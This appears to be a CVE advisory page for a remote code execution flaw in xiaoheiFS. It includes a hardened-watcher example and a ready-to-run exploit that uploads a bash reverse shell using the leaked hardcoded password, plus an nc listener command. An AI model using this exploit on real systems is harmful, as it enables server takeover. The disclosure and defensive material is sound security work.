Security Vulnerability Report
CVE-2026-28674 CVSS 7.2 HIGH

CVE-2026-28674

Published: 2026-03-18 01:16:05
Last Modified: 2026-03-23 17:57:35

Description

xiaoheiFS is a self-hosted financial and operational system for cloud service businesses. In versions up to and including 0.3.15, the `AdminPaymentPluginUpload` endpoint lets admins upload any file to `plugins/payment/`. It only checks a hardcoded password (`qweasd123456`) and ignores file content. A background watcher (`StartWatcher`) then scans this folder every 5 seconds. If it finds a new executable, it runs it immediately, resulting in RCE. Version 4.0.0 fixes the issue.
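The failure mode the description lays out is a chain of two weak links: an upload handler that accepts any content, and a poller that treats "new executable in the plugin directory" as "run it". The following is an added example (not xiaoheiFS code and not from the advisory) that models that watcher selection logic beside a hardened version: the hardened selector never executes anything itself, only approves regular, non-world-writable files whose SHA-256 matches an operator-maintained manifest, and returns a reason for every rejection so it can be logged and alerted on. The directory layout, manifest format, file names and contents are constructed for the demonstration.

```python
"""
Added example: the auto-execute watcher pattern behind CVE-2026-28674 next to
a pinned-hash selector. Nothing here is xiaoheiFS code; directory layout,
manifest format and file names are assumptions made for the demonstration.
"""
import hashlib
import os
import stat
import tempfile
from dataclasses import dataclass


@dataclass
class Decision:
    name: str
    approved: bool
    reason: str


def sha256_file(path: str) -> str:
    """Stream the file through SHA-256 so large plugins are not read at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def vulnerable_select(plugin_dir: str, seen: set) -> list:
    """Models the vulnerable watcher: every unseen regular file carrying an
    execute bit is queued for execution, whatever it is or who wrote it."""
    to_run = []
    for name in sorted(os.listdir(plugin_dir)):
        path = os.path.join(plugin_dir, name)
        if path in seen:
            continue
        seen.add(path)
        st = os.lstat(path)
        if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IXUSR:
            to_run.append(name)
    return to_run


def hardened_select(plugin_dir: str, manifest: dict, seen: set) -> list:
    """Approve only files the operator has pinned by hash. Returns one
    Decision per new file; the caller decides whether to load or quarantine."""
    decisions = []
    for name in sorted(os.listdir(plugin_dir)):
        path = os.path.join(plugin_dir, name)
        if path in seen:
            continue
        seen.add(path)
        st = os.lstat(path)  # lstat: never follow a symlink out of the directory
        if not stat.S_ISREG(st.st_mode):
            decisions.append(Decision(name, False, "not a regular file"))
            continue
        if st.st_mode & stat.S_IWOTH:
            decisions.append(Decision(name, False, "world-writable"))
            continue
        expected = manifest.get(name)
        actual = sha256_file(path)
        if expected is None:
            decisions.append(Decision(name, False, "not listed in manifest"))
        elif actual != expected:
            decisions.append(Decision(name, False, "hash mismatch with manifest"))
        else:
            decisions.append(Decision(name, True, "hash matches manifest"))
    return decisions


def demo() -> dict:
    """Constructed scenario: one pinned plugin, one unknown executable script
    dropped into the directory, and one pinned name whose bytes were changed."""
    files = {
        "approved_plugin.bin": (b"approved plugin bytes", 0o755),
        "dropped_script.sh": (b"#!/bin/sh\necho unexpected\n", 0o755),
        "tampered_plugin.bin": (b"not the bytes that were pinned", 0o755),
    }
    # Operator-maintained manifest: file name -> SHA-256 of the reviewed build.
    manifest = {
        "approved_plugin.bin": hashlib.sha256(b"approved plugin bytes").hexdigest(),
        "tampered_plugin.bin": hashlib.sha256(b"original pinned bytes").hexdigest(),
    }
    with tempfile.TemporaryDirectory(prefix="payment-plugins-") as plugin_dir:
        for name, (content, mode) in files.items():
            path = os.path.join(plugin_dir, name)
            with open(path, "wb") as f:
                f.write(content)
            os.chmod(path, mode)
        would_run = vulnerable_select(plugin_dir, set())
        decisions = hardened_select(plugin_dir, manifest, set())
    return {
        "vulnerable_would_run": would_run,
        "hardened_approved": [d.name for d in decisions if d.approved],
        "hardened_rejected": {d.name: d.reason for d in decisions if not d.approved},
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The vulnerable selector queues all three files because each carries an execute bit; the hardened one approves only the file whose bytes match the manifest and names why the other two were refused. Pinning by hash rather than by file name is what makes the tampered plugin fail, and keeping execution out of the selector means a compromised upload path can at most produce an alert, not a shell.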

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:danvei233:xiaoheifs:*:*:*:*:*:*:*:* - VULNERABLE
xiaoheiFS <= 0.3.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2026-28674 PoC - xiaoheiFS Plugin Upload RCE

xiaoheiFS versions <= 0.3.15 allow remote code execution via
AdminPaymentPluginUpload endpoint. The endpoint uses hardcoded password
'qweasd123456' and StartWatcher auto-executes uploaded files.
"""
import requests
import argparse
import time
import sys


def exploit(target_url, password, lhost, lport):
    """
    Exploit the plugin upload vulnerability to achieve RCE
    """
    upload_url = f"{target_url}/admin/plugin/upload"

    # Create malicious plugin file with reverse shell payload
    # The StartWatcher will execute this file after 5 seconds
    reverse_shell = f'''#!/bin/bash
bash -i >& /dev/tcp/{lhost}/{lport} 0>&1
'''

    headers = {
        "Authorization": password,
    }

    files = {
        "file": ("shell.sh", reverse_shell.encode(), "application/x-sh")
    }

    print(f"[*] Target: {target_url}")
    print(f"[*] Using hardcoded password: {password}")
    print(f"[*] Uploading malicious plugin...")

    try:
        response = requests.post(upload_url, headers=headers, files=files, timeout=30)
        print(f"[*] Response Status: {response.status_code}")

        if response.status_code == 200:
            print("[+] Plugin uploaded successfully!")
            print("[*] Waiting for StartWatcher to execute the payload (5 seconds)...")
            time.sleep(6)
            print("[!] Check your listener for incoming reverse shell!")
        else:
            print(f"[-] Upload failed with status: {response.status_code}")
            print(f"[-] Response: {response.text[:200]}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        sys.exit(1)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2026-28674 PoC - xiaoheiFS RCE")
    parser.add_argument("-t", "--target", required=True,
                        help="Target URL (e.g., http://192.168.1.100:8080)")
    parser.add_argument("-p", "--password", default="qweasd123456",
                        help="Hardcoded authentication password")
    parser.add_argument("-lh", "--lhost", required=True,
                        help="Attacker listener host IP")
    parser.add_argument("-lp", "--lport", required=True, type=int,
                        help="Attacker listener port")
    args = parser.parse_args()
    exploit(args.target, args.password, args.lhost, args.lport)

# Usage:
# Attacker side: nc -lvnp 4444
# Run PoC: python3 cve-2026-28674.py -t http://target:8080 -lh 192.168.1.100 -lp 4444
```

References

https://github.com/danvei233/xiaoheiFS/security/advisories/GHSA-hcj4-gfvq-qv4p (Exploit, Vendor Advisory)
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-28674", "sourceIdentifier": "[email protected]", "published": "2026-03-18T01:16:05.280", "lastModified": "2026-03-23T17:57:34.633", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "xiaoheiFS is a self-hosted financial and operational system for cloud service businesses. In versions up to and including 0.3.15, the `AdminPaymentPluginUpload` endpoint lets admins upload any file to `plugins/payment/`. It only checks a hardcoded password (`qweasd123456`) and ignores file content. A background watcher (`StartWatcher`) then scans this folder every 5 seconds. If it finds a new executable, it runs it immediately, resulting in RCE. Version 4.0.0 fixes the issue."}, {"lang": "es", "value": "xiaoheiFS es un sistema financiero y operativo autohospedado para negocios de servicios en la nube. En versiones hasta la 0.3.15 inclusive, el endpoint 'AdminPaymentPluginUpload' permite a los administradores subir cualquier archivo a 'plugins/payment/'. Solo verifica una contraseña codificada ('qweasd123456') e ignora el contenido del archivo. Un observador en segundo plano ('StartWatcher') escanea esta carpeta cada 5 segundos. Si encuentra un nuevo ejecutable, lo ejecuta inmediatamente, lo que resulta en RCE. La versión 4.0.0 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}, {"lang": "en", "value": "CWE-798"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:danvei233:xiaoheifs:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.4.0", "matchCriteriaId": "D0180A96-D887-4385-AC4F-58ECEAAC15D3"}]}]}], "references": [{"url": "https://github.com/danvei233/xiaoheiFS/security/advisories/GHSA-hcj4-gfvq-qv4p", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/danvei233/xiaoheiFS/security/advisories/GHSA-hcj4-gfvq-qv4p", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
```